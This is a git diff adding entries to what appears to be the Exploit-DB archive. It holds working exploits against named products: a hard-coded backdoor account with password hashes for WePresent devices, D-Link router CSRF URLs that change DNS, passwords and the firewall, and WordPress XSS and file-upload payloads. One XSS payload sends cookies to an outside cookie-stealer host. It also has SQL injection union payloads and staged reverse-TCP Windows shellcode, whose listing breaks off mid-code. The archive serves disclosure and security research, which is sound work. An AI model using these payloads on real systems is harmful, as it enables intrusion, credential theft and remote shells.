diff --git a/files.csv b/files.csv
index b363ee91b..4cde2ee9b 100644
--- a/files.csv
+++ b/files.csv
@@ -15304,6 +15304,8 @@ id,file,description,date,author,platform,type,port
41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
41443,platforms/macos/remote/41443.html,"macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0
+41479,platforms/windows/remote/41479.py,"SysGauge 1.5.18 - Buffer Overflow",2017-02-28,"Peter Baris",windows,remote,0
+41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -15924,6 +15926,7 @@ id,file,description,date,author,platform,type,port
41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
+41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -37392,3 +37395,14 @@ id,file,description,date,author,platform,type,port
41466,platforms/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",java,webapps,0
41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0
41472,platforms/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,hardware,webapps,0
+41478,platforms/hardware/webapps/41478.txt,"DLink DSL-2730U Wireless N 150 - Cross-Site Request Forgery",2017-03-01,"B GOVIND",hardware,webapps,0
+41482,platforms/xml/webapps/41482.txt,"Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting",2017-03-01,"SEC Consult",xml,webapps,0
+41483,platforms/php/webapps/41483.html,"WordPress Plugin Contact Form Manager - Cross-Site Request Forgery / Cross-Site Scripting",2017-03-01,"Edwin Molenaar",php,webapps,80
+41484,platforms/php/webapps/41484.txt,"WordPress Plugin User Login Log 2.2.1 - Cross-Site Scripting",2017-03-01,"Axel Koolhaas",php,webapps,80
+41485,platforms/php/webapps/41485.html,"WordPress Plugin Popup by Supsystic 1.7.6 - Cross-Site Request Forgery",2017-03-01,"Radjnies Bhansingh",php,webapps,80
+41486,platforms/php/webapps/41486.txt,"WordPress Plugin NewStatPress 1.2.4 - Cross-Site Scripting",2017-03-01,"Han Sahin",php,webapps,80
+41487,platforms/php/webapps/41487.html,"WordPress Plugin Global Content Blocks 2.1.5 - Cross-Site Request Forgery",2017-03-01,"Yorick Koster",php,webapps,80
+41488,platforms/php/webapps/41488.html,"WordPress Plugin File Manager 3.0.1 - Cross-Site Request Forgery",2017-03-01,"David Vaartjes",php,webapps,80
+41489,platforms/php/webapps/41489.txt,"SchoolDir - SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0
+41490,platforms/php/webapps/41490.txt,"Rage Faces Script 1.3 - SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0
+41491,platforms/php/webapps/41491.txt,"Meme Maker Script 2.1 - 'user' Parameter SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/hardware/remote/41480.txt b/platforms/hardware/remote/41480.txt
new file mode 100755
index 000000000..251f1638c
--- /dev/null
+++ b/platforms/hardware/remote/41480.txt
@@ -0,0 +1,23 @@
+# Exploit Title: CVE-2017-6351 - WePresent undocumented privileged manufacturer backdoor account
+# Date: 27/02/2017
+# Exploit Author: Quentin Olagne
+# Vendor Homepage: http://www.wepresentwifi.com/ or http://www.awindinc.com/products_wepresent_wipg_1500.html
+# Software Link: http://www.awindinc.com/products_wepresent_wipg_1500.html
+# Version: All versions of WiPG-1500 devices up to the latest firmware (1.0.3.7)
+# Tested on: Latest firmware (1.0.3.7) of WiPG-1500 device
+# CVE : CVE-2017-6351
+
+WiPG-1500 device embeds a firmware with a manufacturer account with hard coded username / password.
+Once the device is set in DEBUG mode, an attacker can connect to the device using telnet protocol and log in the device with the 'abarco' hard-coded manufacturer account.
+
+This account is not documented, neither the DEBUG feature nor the use of telnetd on a port TCP/5885 (when debug mode is ON).
+
+Here's the extract of the linux 'passwd' file:
+root:x:0:0:root:/home:/bin/sh
+abarco:x:1000:0:Awind-Barco User,,,:/home:/bin/sh
+
+and the 'shadow':
+root:$1$x1mFoD3w$uuvn.Z0p.XagX29uN3/Oa.:0:0:99999:7:::
+abarco:$1$JB0Pn5dA$sROUF.bZVoQSjVrV06fIx1:0:0:99999:7:::
+
+This vulnerability has been reported to the vendor but this product (WiPG-1500) is no longer maintained. This means it's a #WONTFIX vulnerability. Vendor has removed the 'abarco' account on the newest models but don't worry, DEBUG mode is still there with telnetd and you can also use the r00t account with a home and /bin/sh on the other systems in any case.
\ No newline at end of file
diff --git a/platforms/hardware/webapps/41478.txt b/platforms/hardware/webapps/41478.txt
new file mode 100755
index 000000000..f09949705
--- /dev/null
+++ b/platforms/hardware/webapps/41478.txt
@@ -0,0 +1,120 @@
+Author : B GOVIND
+Exploit Title : DLink DSL-2730U Wireless N 150, Change DNS Configuration bypassing ‘admin’ privilege
+Date : 01-03-2017
+Vendor Homepage : http://www.dlink.co.in
+Firmware Link : ftp://support.dlink.co.in/firmware/DSL-2730U
+Affected version : Hardware ver C1, Firmware ver: IN_1.0.0
+Email id : govindnair7102@gmail.com
+CVE : CVE-2017-6411
+
+Change DNS Configuration Bypassing ‘admin’ Privilege
+-------------------------------------------------------
+
+D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts ‘admin’, ‘support’ and ‘user’. As per D-Link only “admin" account has unrestricted access to change configuration of device. Account name ‘user’ can just view configuration settings and statistics.
+
+1. Description of Vulnerability
+
+Cross Site Request Forgery can be used to manipulate dnscfg.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can change primary and secondary DNS IP address to some malicious IP address without using ‘admin’ account.
+
+2. Proof of Concept
+
+Use following URL to modify the DNS entries:
+
+ http://user:user@192.168.1.1/dnscfg.cgi?dnsPrimary=x.x.x.x&dnsSecondary=y.y.y.y&dnsIfcsList=&dnsRefresh=1
+
+ Here x.x.x.x and y.y.y.y are the malicious IP address attacker can use.
+
+
+
+3. Impact of vulnerability
+
+Information Disclosure: An attacker exploiting this vulnerability can obtain confidential information like users browsing profile. Modifying device DNS settings allows cybercriminals to perform malicious activities like the following:
+
+(a) Redirect user traffic to malicious/fake sites. These sites can be phishing pages that spoofs well-known sites and tricks users into submit sensitive user credentials like banks account username and password.
+
+(b) This can ensure that no more patches are updated from OS vendor sites or firewall sites.
+
+(c) Replace ads on legitimate sites and serve users with unwanted/fake ads.
+
+(d) Pushing malwares.
+
+4. Solution
+
+As per D-Link India this is the only no updated firmware is available for this hardware version which can mitigate this vulnerability which avoids privilege escalation.
+All users of this hardware should change default passwords of not just ‘admin’ account but also ‘user’ and ‘support’
+
+Change All Account Password Bypassing ‘admin’ Privilege
+----------------------------------------------------------
+
+ D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts ‘admin’, ‘support’ and ‘user’. As per D-Link only “admin" account has unrestricted access to change configuration of device. Account name ‘user’ can just view configuration settings and statistics. Default password of admin, support and user account are admin, support and user respectively.
+
+1. Description of Vulnerability
+
+ Cross Site Request Forgery can be used to manipulate password.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can change password of all the three accounts without using ‘admin’ account.
+
+2. Proof of Concept
+
+This exploit works only when accounts are using default password.
+
+Use following URL to change ‘admin’ account password from ‘admin’ to
+‘admin1’.
+
+ http://user:user@192.168.1.1/password.cgi?
+inUserName=admin&inPassword=ZGFyZWFkbWluMQ==&inOrgPassword=ZGFyZWFkbWlu
+
+(b) Use following URL to change ‘support’ account password from ‘support’ to
+‘support1’.
+
+http://user:user@192.168.1.1/password.cgi?
+inUserName=support&inPassword=ZGFyZXN1cHBvcnQx&inOrgPassword=ZGFyZXN1cHBvcnQ=
+
+(c) Use following URL to change ‘user’ account password from ‘user’ to
+‘user1’.
+
+http://user:user@192.168.1.1/password.cgi?
+inUserName=user&inPassword=ZGFyZXVzZXIx&inOrgPassword=ZGFyZXVzZXI=
+
+Here ‘inPassword’ is the new password and ‘inOrgPassword’ is the existing password. Both these password strings are base64 encoded for confidentiality as connection between browser and web server is using http.
+
+
+3. Impact of vulnerability
+
+Elevation of privilege, Information Disclosure, Denial Of service
+
+(a) Insider/Attacker can change the passwords of all the existing accounts and control the device as required. This will result in attacker having complete control over the device. He can capture traffic of other user and analyse traffic. Attacker can deny services as per his/her choice.
+
+4. Solution
+
+ As per D-Link India this is the only no updated firmware available for this hardware version which can mitigate this vulnerability. All users of this hardware should change default passwords of all the default accounts.
+
+
+Enable/Disable LAN side Firewall without admin privilege
+---------------------------------------------------------
+
+ D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts ‘admin’, ‘support’ and ‘user’. As per D-Link only “admin" account has unrestricted access to change configuration of device. Account name ‘user’ can just view configuration settings and statistics. Default password of admin, support and user account are admin, support and user respectively.
+
+1. Description of Vulnerability
+
+ Cross Site Request Forgery can be used to manipulate lancfg2.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can enable/disable LAN side firewall without ‘admin’ privilege using ‘user ‘ account.
+
+2. Proof of Concept
+
+ Use following URL to enable LAN side firewall
+
+ http://user:user@192.168.1.1/lancfg2.cgi?ethIpAddress=192.168.1.1ð SubnetMask=255.255.255.0&enblLanFirewall=1&enblIgmpSnp=0&enblIgmpMode=0&dhcpEthStart=192.168.1.2&dhcpEthEnd=192.168.1.254&dhcpLeasedTime=86400&enblDhcpSrv=1&enblLan2=0&enblLanDns=0
+
+
+
+Use following URL to disable LAN side firewall
+
+http://user:user@192.168.1.1/lancfg2.cgi?ethIpAddress=192.168.1.1ðSubnetMask=255.255.255.0&enblLanFirewall=0&enblIgmpSnp=0&enblIgmpMode=0&dhcpEthStart=192.168.1.2&dhcpEthEnd=192.168.1.254&dhcpLeasedTime=86400&enblDhcpSrv=1&enblLan2=0&enblLanDns=0
+
+
+3. Impact of vulnerability
+
+By disabling LAN side firewall and by enabling Port Triggering, an attacker can ensure a backdoor access within LAN side as well as from WAN side.
+Attacker can run port scanning tools to map services which otherwise wont be possible with firewall enabled.
+
+4. Solution
+
+ As per D-Link India this is the only no updated firmware available for this hardware version which can mitigate this vulnerability. All users of this hardware should change default passwords of all the default accounts.
\ No newline at end of file
diff --git a/platforms/php/webapps/41483.html b/platforms/php/webapps/41483.html
new file mode 100755
index 000000000..c4fa6b41b
--- /dev/null
+++ b/platforms/php/webapps/41483.html
@@ -0,0 +1,53 @@
+
+
+
+
+
+
+
+
diff --git a/platforms/php/webapps/41484.txt b/platforms/php/webapps/41484.txt
new file mode 100755
index 000000000..86199a0de
--- /dev/null
+++ b/platforms/php/webapps/41484.txt
@@ -0,0 +1,53 @@
+Source: https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_user_login_log_wordpress_plugin.html
+
+Abstract
+A stored Cross-Site Scripting vulnerability was found in the User Login Log WordPress Plugin. This issue can be exploited by Subscriber (or higher) and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.
+
+Contact
+For feedback or questions about this advisory mail us at sumofpwn at securify.nl
+
+The Summer of Pwnage
+This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
+
+OVE ID
+OVE-20160724-0011
+
+Tested versions
+This issue was successfully tested on User Login Log WordPress Plugin version 2.2.1.
+
+Fix
+There is currently no fix available.
+
+Introduction
+The User Login Log WordPress Plugin track records of WordPress user login with set of multiple information like ip, date , time, country , city, and user name. A stored Cross-Site Scripting vulnerability was found in the User Login Log WordPress Plugin. This issue can be exploited by Subscriber (or higher) and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.
+
+Details
+This vulnerability exists due to the lack of encoding of the User-Agent HTTP request header. This issue exists in method column_default() that is implemented in the file user-login-log.php.
+
+function column_default($item, $column_name)
+{
+
+[...]
+
+ switch($column_name){
+
+[...]
+
+ default:
+ return $item[$column_name];
+ }
+}
+Proof of concept:
+
+POST /wp-login.php HTTP/1.1
+Host:
+User-Agent: XSSXSS
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.8
+Accept-Encoding: gzip,deflate,lzma,sdch
+Cookie: wordpress_test_cookie=WP+Cookie+check
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+log=&pwd=&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1
diff --git a/platforms/php/webapps/41485.html b/platforms/php/webapps/41485.html
new file mode 100755
index 000000000..4ba054f51
--- /dev/null
+++ b/platforms/php/webapps/41485.html
@@ -0,0 +1,151 @@
+
+
+
+
+
+
+
diff --git a/platforms/php/webapps/41486.txt b/platforms/php/webapps/41486.txt
new file mode 100755
index 000000000..adf03b27a
--- /dev/null
+++ b/platforms/php/webapps/41486.txt
@@ -0,0 +1,48 @@
+Source: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_the_wordpress_newstatpress_plugin.html
+
+Abstract
+A persistent Cross-Site Scripting (XSS) vulnerability has been found in the WordPress NewStatPress plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.
+
+Contact
+For feedback or questions about this advisory mail us at sumofpwn at securify.nl
+
+The Summer of Pwnage
+This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
+
+OVE ID
+OVE-20160712-0030
+
+Tested versions
+This issue was successfully tested on WordPress NewStatPress plugin version 1.2.4.
+
+Fix
+This issue has been addressed in NewStatPress version 1.2.5. This version can be download from the NewStatPress GitHub account: https://github.com/lechab/newstatpress#125
+
+Introduction
+The WordPress NewStatPress plugin is a real-time plugin to manage the visits' statistics on a WordPress site. It doesn't require external web analytics. A persistent Cross-Site Scripting vulnerability has been discovered in the WordPress NewStatPress plugin which allows an unauthenticated attacker to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes or deliver malware.
+
+Details
+The WordPress NewStatPress plugin fails to sufficiently check input supplied to a GET request for a resource on a WordPress site with a vulnerable version of the NewStatPress plugin. In addition input supplied to the Referer header is insufficiently sanitized. As a result a malicious request will be stored on the Last Visitors and Visitors tab of the Visits page, executing the payload when an unsuspecting user views one of the mentioned tabs on this page.
+
+Persistent Cross-Site Scripting vulnerabilities are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, in this case potentially a WP admin reviewing the stats.
+
+Proof of concept
+This vulnerability can be demonstrated by submitting the following request:
+
+GET /sumofpwn/"> HTTP/1.1
+Host: 192.168.28.129
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla Chrome/51.0.2704.103 Safari/537.36
+Referer: javascript:document.location=`http://www.XXXXXXyourhackerdomainXXXXXX.nl/demo/xss/cookiestealer.php?c=`+encodeURIComponent(document.cookie);
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate, sdch
+Accept-Language: en-US,en;q=0.8,nl;q=0.6
+Connection: close
+
+Based on the above request, the vulnerable output will be:
+
+1) " target="_blank">/sumofpwn/\">
+2) Arrived from javascript:document.location=`http://www.sfylabs.nl/demo/xss/cookiestealer.php?c=`+encodeURIComponent(document.cookie);
+
+http://yourhost/wp-admin/admin.php?page=nsp_main
+http://yourhost/wp-admin/admin.php?page=nsp_visits
diff --git a/platforms/php/webapps/41487.html b/platforms/php/webapps/41487.html
new file mode 100755
index 000000000..46268170a
--- /dev/null
+++ b/platforms/php/webapps/41487.html
@@ -0,0 +1,46 @@
+
+
+
+
+
+
+
diff --git a/platforms/php/webapps/41488.html b/platforms/php/webapps/41488.html
new file mode 100755
index 000000000..472dcdeac
--- /dev/null
+++ b/platforms/php/webapps/41488.html
@@ -0,0 +1,68 @@
+
+
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host:
+Cookie: ALL_YOUR_WP_COOKIES
+Connection: close
+Content-Type: multipart/form-data; boundary=---------------------------6427194103423794601262893907
+
+-----------------------------6427194103423794601262893907
+Content-Disposition: form-data; name="cmd"
+
+upload
+-----------------------------6427194103423794601262893907
+Content-Disposition: form-data; name="target"
+
+l1_d3AtY29udGVudC91cGxvYWRzL2ZpbGUtbWFuYWdlcg
+-----------------------------6427194103423794601262893907
+Content-Disposition: form-data; name="suffix"
+
+~
+-----------------------------6427194103423794601262893907
+Content-Disposition: form-data; name="action"
+
+connector
+-----------------------------6427194103423794601262893907
+Content-Disposition: form-data; name="upload[]"; filename="info.php"
+Content-Type: text/php
+
+
+-----------------------------6427194103423794601262893907--
diff --git a/platforms/php/webapps/41489.txt b/platforms/php/webapps/41489.txt
new file mode 100755
index 000000000..a8a4c8725
--- /dev/null
+++ b/platforms/php/webapps/41489.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: SchoolDir - SQL Injection
+# Google Dork: N/A
+# Date: 01.03.2017
+# Vendor Homepage: http://www.brynamics.xyz/
+# Software: https://codecanyon.net/item/schooldir/19326269
+# Demo: http://www.brynamics.xyz/schooldir/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search?searchItem=[SQL]&criteria=schools
+# http://localhost/[PATH]/sortsearch?School_type=[SQL]&fees=2&ownership=federal&location=Nigeria&searchItem=Harvard+University&criteria=schools
+# If you don't know to use the vulnerabilities, you don't need to check it.
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41490.txt b/platforms/php/webapps/41490.txt
new file mode 100755
index 000000000..0cc1fe5cd
--- /dev/null
+++ b/platforms/php/webapps/41490.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: Rage Faces Script v1.3 - SQL Injection
+# Google Dork: N/A
+# Date: 01.03.2017
+# Vendor Homepage: http://www.memesoftware.com/
+# Software: http://www.memesoftware.com/ragefaces.php
+# Demo: http://ragefaces.memesoftware.com/
+# Version: 1.3
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/face.php?face=[SQL]
+-2')+/*!50000union*/+select+1,2,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5-- -
+# http://localhost/[PATH]/create.php?create=[SQL]
+-1'+/*!50000union*/+Select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3,4,5,6,7,8,9-- -
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41491.txt b/platforms/php/webapps/41491.txt
new file mode 100755
index 000000000..e265816e6
--- /dev/null
+++ b/platforms/php/webapps/41491.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Meme Maker Script 2.1 - SQL Injection
+# Google Dork: N/A
+# Date: 01.03.2017
+# Vendor Homepage: http://www.memesoftware.com/
+# Software: http://www.memesoftware.com/mememaker.php
+# Demo: http://www.memefaces.me/
+# Version: 2.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/profil.php?user=[SQL]
+# -2'+/*!50000union*/+select+1,2,3,4,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),6,7-- -
+# Etc...
+# # # # #
diff --git a/platforms/win_x86/shellcode/41481.asm b/platforms/win_x86/shellcode/41481.asm
new file mode 100755
index 000000000..0ab00bdf8
--- /dev/null
+++ b/platforms/win_x86/shellcode/41481.asm
@@ -0,0 +1,344 @@
+########### Windows x86 Reverse TCP Staged Alphanumeric Shellcode CreateProcessA cmd.exe ########
+ ########### Author: Snir Levi, Applitects #############
+ ## 332 Bytes ##
+ ## For Educational Purposes Only ##
+
+Date: 01.03.17
+Author: Snir Levi
+Email: snircontact@gmail.com
+https://github.com/snir-levi/
+
+IP - 127.0.0.1
+PORT - 4444
+
+Tested on:
+Windows 7
+Windows 10
+ ###Usage###
+ Victim Executes the first stage shellcode, and opens tcp connection
+ After Connection is established, send the Alphanumeric stage to the connection
+
+ nc -lvp 4444
+ connect to [127.0.0.1] from localhost [127.0.0.1] (port)
+ RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS
+
+ Microsoft Windows [Version 10.0.14393]
+ (c) 2016 Microsoft Corporation. All rights reserved.
+
+ C:\Users\>
+ ###########
+
+
+
+##Shellcode##
+
+
+#### Second Stage Alphanumeric shellcode: #####
+
+RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS
+
+
+R push edx
+P push eax
+hoces push 0x7365636f //oces
+htePr push 0x72506574 //tePr
+hCrea push 0x61657243 //Crea
+T push esp
+Q push ecx
+PX will be replaced with call [esi] (0x16ff)
+L*8 dec esp // offset esp to kernel32.dll Address
+Y pop ecx // ecx = kernel32
+F*4 inc esi -> offset [esi+4]
+PX will be replaced with mov [esi],eax (0x0689)
+N*4 dec esi -> offset [esi]
+j0 push 0x30
+X pop eax
+H*48 dec eax // zeroing eax
+P push eax
+hessA push 0x41737365 //essA (will be null terminated)
+hProc push 0x636f7250 //Proc
+hExit push 0x74697845 //Exit
+T push esp
+Q push ecx
+PX will be replaced with call [esi] (0x16ff)
+F*8 inc esi -> offset [esi+8]
+PX will be replaced with mov [esi],eax (0x0689)
+Z*10 offset stack to &processinfo
+j0 push 0x30
+Y pop ecx
+I*48 dec ecx // zeroing ecx
+T push esp
+X pop eax //eax = &PROCESS_INFORMATION
+Q*4 push ecx //sub esp,16
+W push edi
+W push edi
+W push edi
+Q push ecx
+Q push ecx
+B inc edx
+R push edx
+Q*10 push ecx
+jD push 0x44
+T push esp
+Z pop edx //edx = &STARTUPINFOA
+hexeC push 0x65
+hcmd. push 0x78652e64
+T push esp // &'cmd.exe'
+Y pop ecx
+P push eax // &PROCESS_INFORMATION
+R push edx // &STARTUPINFOA
+j0 push 0x30
+Z pop edx
+J*48 dec edx // zeroing edx
+R*3 push edx
+B inc edx
+R push edx
+J dec edx
+R*2 push edx
+Q push ecx ; &'cmd.exe'
+R push edx
+A*7 inc ecx //offset ecx to [C]exeh -> will be null terminated
+N*4 dec esi //offset [esi+4] to CreateProccesA
+S push ebx ; return address
+
+
+
+## First Stage Shellcode ##
+
+
+global _start
+
+section .text
+
+
+_start:
+ xor eax,eax
+ push eax ; null terminator for createProcA
+
+ mov eax,[fs:eax+0x30] ; Proccess Enviroment Block
+ mov eax,[eax+0xc]
+ mov esi,[eax+0x14]
+ lodsd
+ xchg esi,eax
+ lodsd
+ mov ebx,[eax+0x10] ; kernel32
+
+ mov ecx,[ebx+0x3c] ; DOS->elf_anew
+ add ecx, ebx; Skip to PE start
+ mov ecx, [ecx+0x78] ; offset to export table
+ add ecx,ebx ; kernel32 image_export_dir
+
+ mov esi,[ecx+0x20] ; Name Table
+ add esi,ebx
+
+ xor edx,edx
+
+ getProcAddress:
+ inc edx
+ lodsd
+ add eax,ebx
+ cmp dword [eax],'GetP'
+ jne getProcAddress
+ cmp dword [eax+4],'rocA'
+ jne getProcAddress
+
+ ;---Function Adresses Chain----
+ ;[esi] GetProcAddress
+ ;[esi+12] WSAstartup
+ ;[esi+16] WSASocketA
+ ;[esi+20] connect
+ ;[esi+24] recv
+ ;[esi+28] kernel32
+
+ ;Alphanumeric stage store:
+ ;[esi+4] CreateProcessA
+ ;[esi+8] ExitProccess
+
+
+ mov esi,[ecx+0x1c] ; Functions Addresses Chain
+ add esi,ebx
+ mov edx,[esi+edx*4]
+ add edx,ebx ; GetProcAddress
+
+ sub esp, 32 ; Buffer for the function addresses chain
+ push esp
+ pop esi
+ mov [esp],edx ; esi offset 0 -> GetProcAddress
+ mov [esi+28],ebx ;esi offset 28 -> kernel32
+
+ ;--------winsock2.dll Address--------------
+ xor edi,edi
+ push edi
+ push 0x41797261 ; Ayra
+ push 0x7262694c ; rbiL
+ push 0x64616f4c ; daoL
+ push esp
+ push ebx
+
+ call [esi]
+
+ ;-----ws2_32.dll Address-------
+ xor ecx,ecx
+ push ecx
+ mov cx, 0x3233 ; 0023
+ push ecx
+ push 0x5f327377 ; _2sw
+ push esp
+
+ call eax
+ mov ebp,eax ;ebp = ws2_32.dll
+
+ ;-------WSAstartup Address-------------
+ xor ecx,ecx
+ push ecx
+ mov cx, 0x7075 ; 00up
+ push ecx
+ push 0x74726174 ; trat
+ push 0x53415357 ; SASW
+ push esp
+ push ebp
+
+ call [esi]
+ mov [esi+12],eax ;esi offset 12 -> WSAstartup
+
+ ;-------WSASocketA Address-------------
+ xor ecx,ecx
+ push ecx
+ mov cx, 0x4174 ; 00At
+ push ecx
+ push 0x656b636f ; ekco
+ push 0x53415357 ; SASW
+ push esp
+ push ebp
+
+ call [esi]
+ mov [esi+16],eax;esi offset 16 -> WSASocketA
+
+ ;------connect Address-----------
+ push edi
+ mov ecx, 0x74636565 ; '\0tce'
+ shr ecx, 8
+ push ecx
+ push 0x6e6e6f63 ; 'nnoc'
+ push esp
+ push ebp
+
+ call [esi]
+ mov [esi+20],eax;esi offset 20 -> connect
+
+ ;------recv Address-------------
+ push edi
+ push 0x76636572 ;vcer
+ push esp
+ push ebp
+
+ call [esi]
+ mov [esi+24],eax;esi offset 24 -> recv
+
+ ;------call WSAstartup()----------
+ xor ecx,ecx
+ sub sp,700
+ push esp
+ mov cx,514
+ push ecx
+ call [esi+12]
+
+ ;--------call WSASocket()-----------
+ ; WSASocket(AF_INET = 2, SOCK_STREAM = 1,
+ ; IPPROTO_TCP = 6, NULL,
+ ;(unsigned int)NULL, (unsigned int)NULL);
+
+ push eax ; if successful, eax = 0
+ push eax
+ push eax
+ mov al,6
+ push eax
+ mov al,1
+ push eax
+ inc eax
+ push eax
+
+ call [esi+16]
+ xchg eax, edi ; edi = SocketRefernce
+
+
+ ;--------call connect----------
+
+ ;struct sockaddr_in {
+ ; short sin_family;
+ ; u_short sin_port;
+ ; struct in_addr sin_addr;
+ ; char sin_zero[8];
+ ;};
+
+
+ push byte 0x1
+ pop edx
+ shl edx, 24
